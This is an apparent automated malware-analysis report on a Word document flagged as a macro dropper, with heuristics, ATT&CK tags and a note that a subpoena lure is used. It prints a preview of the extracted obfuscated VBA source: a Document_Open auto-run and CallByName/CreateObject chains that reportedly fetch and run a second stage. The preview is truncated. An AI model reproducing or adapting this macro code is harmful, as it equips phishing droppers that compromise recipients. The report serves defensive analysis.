MALICIOUS
282
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains VBA macros, including a Document_Open macro, which is a common technique for executing malicious code upon opening a document. The script appears to be obfuscated but uses CreateObject and CallByName, indicating it likely attempts to download and execute a second-stage payload. The document body presents a subpoena to lure the user into enabling macros.
Heuristics 8
-
ClamAV: Doc.Dropper.Agent-1399074 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-1399074
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
CallByName call high OLE_VBA_CALLBYNAMECallByName call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 14360 bytes |
SHA-256: fc615b8cb3a9096e06fb4d59a9c6e4e58d6b1cd102ef1a0abe19230fab3cdfc6 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
TlZjc2De8.QQeu4iQ9ZhW
End Sub
Public Sub yj5zhKqBmrCl9PP()
Dim c3wXPiAOmzJYx As Object
Dim EVZTdzs As Integer
Dim DMkguWXTWAJm7sH As Variant
Dim oajqhL As Variant
On Error GoTo FPSPmRELh0f
Set c3wXPiAOmzJYx = evslot.yPZ74txZOio(nclOESQBrSf(mLug7isEYOXiC.gyClXPESEhF, 48), U2GPMn00xXx.SKW2fm)
EVZTdzs = VriImfWA1KN(c3wXPiAOmzJYx, nclOESQBrSf(mLug7isEYOXiC.uzNQPlLRAj, 114))
If EVZTdzs <> hBOZusH.GX4JInHqlx3rYNy Then
Err.Raise Number:=1
End If
DMkguWXTWAJm7sH = VriImfWA1KN(c3wXPiAOmzJYx, nclOESQBrSf(mLug7isEYOXiC.zsuVrFdyiyBmqa, 340))
oajqhL = U2GPMn00xXx.kG3kv8x & hBOZusH.qXC4lks3p & U2GPMn00xXx.cJuUNRrq8exCZ
wtmQYPJ oajqhL, DMkguWXTWAJm7sH
hsdrPqpzSAt oajqhL
Exit Sub
FPSPmRELh0f:
End Sub
Attribute VB_Name = "mLug7isEYOXiC"
Attribute VB_Base = "0{64E31D02-CDB4-4F26-8405-68C97F3169F6}{A702B371-FEAA-44A3-B829-DEDEBA91BDC8}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "evslot"
Private Const vOTRpfGyCjYaAXtBKr As String = "rEqe5nNAVJbstLc9o"
Public Function yPZ74txZOio(ByVal ksBf8QOMgTj As Variant, ByVal EynrZa36t As Variant) As Variant
Set yPZ74txZOio = ZvpNmOJjZe.xKBUnEo2fp(TlZjc2De8.nclOESQBrSf(mLug7isEYOXiC.GRZAWXBhbl, 873))
TlZjc2De8.bBFHwI0Tji yPZ74txZOio, TlZjc2De8.nclOESQBrSf(mLug7isEYOXiC.tAannniEZ, 65), ksBf8QOMgTj, EynrZa36t, False
TlZjc2De8.n3l2A8olHz8c yPZ74txZOio, TlZjc2De8.nclOESQBrSf(mLug7isEYOXiC.oPalzXQSuK, 68)
End Function
Public Function lkHsb4gDkL() As Integer
lkHsb4gDkL = 0
End Function
Public Function xIJO9if64KwwoxM() As Variant
xIJO9if64KwwoxM = U2GPMn00xXx.Kshb5HhPC9yf(TlZjc2De8.nclOESQBrSf(mLug7isEYOXiC.mxPoTjbX, 116), TlZjc2De8.nclOESQBrSf(mLug7isEYOXiC.mkZHhwcJa, 132), TlZjc2De8.nclOESQBrSf(mLug7isEYOXiC.KVWdFbtc, 132), TlZjc2De8.nclOESQBrSf(mLug7isEYOXiC.iGtMYvsOYp, 108), TlZjc2De8.nclOESQBrSf(mLug7isEYOXiC.GyELCwmBxXz, 164), TlZjc2De8.nclOESQBrSf(mLug7isEYOXiC.EPqDUnY, 185))
End Function
Private Function SPKhXgyYpkGt() As Integer
SPKhXgyYpkGt = 1442
End Function
Public Function xdCXs90ZjRT1QzF() As Integer
xdCXs90ZjRT1QzF = 3170 / TlZjc2De8.fFS4YCN
End Function
Public Function rHAZXbgS5Ka() As Variant
rHAZXbgS5Ka = TlZjc2De8.WsJ9yFZs(TlZjc2De8.nclOESQBrSf(mLug7isEYOXiC.qPLWKDTnuKCoPT, 147))
End Function
Public Function A4VmYVPINyAof() As Integer
A4VmYVPINyAof = 2
End Function
Public Function CEtfkJI1() As Boolean
If U2GPMn00xXx.lEiihgAN54Gs0mL Or U2GPMn00xXx.CWDoi639bQ Then
CEtfkJI1 = U2GPMn00xXx.ruGHXG
Else
CEtfkJI1 = True
End If
End Function
Attribute VB_Name = "U2GPMn00xXx"
Public Function LwtDwU4K(ByVal dNScBRLkoFP As Object, ByVal Vl1NpbO6FtY As String, ByVal drLRiTo4jZw1p As Variant) As Variant
Set LwtDwU4K = CallByName(dNScBRLkoFP, Vl1NpbO6FtY, 1, drLRiTo4jZw1p)
End Function
Public Function VriImfWA1KN(ByVal dNScBRLkoFP As Object, ByVal cuLxHH62OJu7 As String) As Variant
VriImfWA1KN = CallByName(dNScBRLkoFP, cuLxHH62OJu7, 2)
End Function
Public Function kG3kv8x() As Variant
kG3kv8x = TlZjc2De8.WsJ9yFZs(TlZjc2De8.nclOESQBrSf(mLug7isEYOXiC.BzZfUYoGyS, 75))
End Function
Private Sub lWQz0T7mr(ByVal dNScBRLkoFP As Variant, ByVal Vl1NpbO6FtY As Variant, ByVal P4FL9kETbRJ As Variant, ByVal FsRcQJ8vgmMYOq As Variant)
CallByName dNScBRLkoFP, Vl1NpbO6FtY, 1, P4FL9kETbRJ, FsRcQJ8vgmMYOq
End Sub
Private Function pnkBfasJXi() As Variant
pnkBfasJXi = VriImfWA1KN(ThisDocument, TlZjc2De8.nclOESQBrSf(mLug7isEYOXiC.jBDagKNjX, 75))
End Function
Public Function Kshb5HhPC9yf(ParamArray VxplD2mN33P() As Variant) As Variant
Kshb5HhPC9yf = VxplD2mN33P
End Function
Public Function cJuUNRrq8exCZ() As String
cJuUNRrq8exCZ = TlZjc2De8.EQyqPA(Rnd)
End Fun
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.